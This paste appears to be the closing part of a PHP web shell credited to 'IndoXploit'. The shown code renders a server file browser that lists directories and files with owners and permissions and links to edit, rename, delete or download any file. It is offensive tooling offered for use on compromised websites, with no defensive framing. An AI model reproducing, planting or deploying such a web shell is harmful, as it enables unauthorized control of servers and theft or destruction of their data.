  1940. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1941. echo "<td class='td_home'><center>$dtype</center></td>";
  1942. echo "<td class='td_home'><center>-</center></th></td>";
  1943. echo "<td class='td_home'><center>$dtime</center></td>";
  1944. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1945. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1946. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1947. echo "</tr>";
  1948. }
  1949. }
  1950. } else {
  1951. echo "<font color=red>can't open directory.</font>";
  1952. }
  1953. foreach($scandir as $file) {
  1954. $ftype = filetype("$dir/$file");
  1955. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1956. $size = filesize("$dir/$file")/1024;
  1957. $size = round($size,3);
  1958. if(function_exists('posix_getpwuid')) {
  1959. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1960. $fowner = $fowner['name'];
  1961. } else {
  1962. //$downer = $uid;
  1963. $fowner = fileowner("$dir/$file");
  1964. }
  1965. if(function_exists('posix_getgrgid')) {
  1966. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1967. $fgrp = $fgrp['name'];
  1968. } else {
  1969. $fgrp = filegroup("$dir/$file");
  1970. }
  1971. if($size > 1024) {
  1972. $size = round($size/1024,2). 'MB';
  1973. } else {
  1974. $size = $size. 'KB';
  1975. }
  1976. if(!is_file("$dir/$file")) continue;
  1977. echo "<tr>";
  1978. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1979. echo "<td class='td_home'><center>$ftype</center></td>";
  1980. echo "<td class='td_home'><center>$size</center></td>";
  1981. echo "<td class='td_home'><center>$ftime</center></td>";
  1982. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1983. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1984. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1985. echo "</tr>";
  1986. }
  1987. echo "</table>";
  1988. if(!is_readable($dir)) {
  1989. //
  1990. } else {
  1991. echo "<hr>";
  1992. }
  1993. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a></center>";
  1994. }
  1995. ?>
  1996. </html>
RAW Paste Data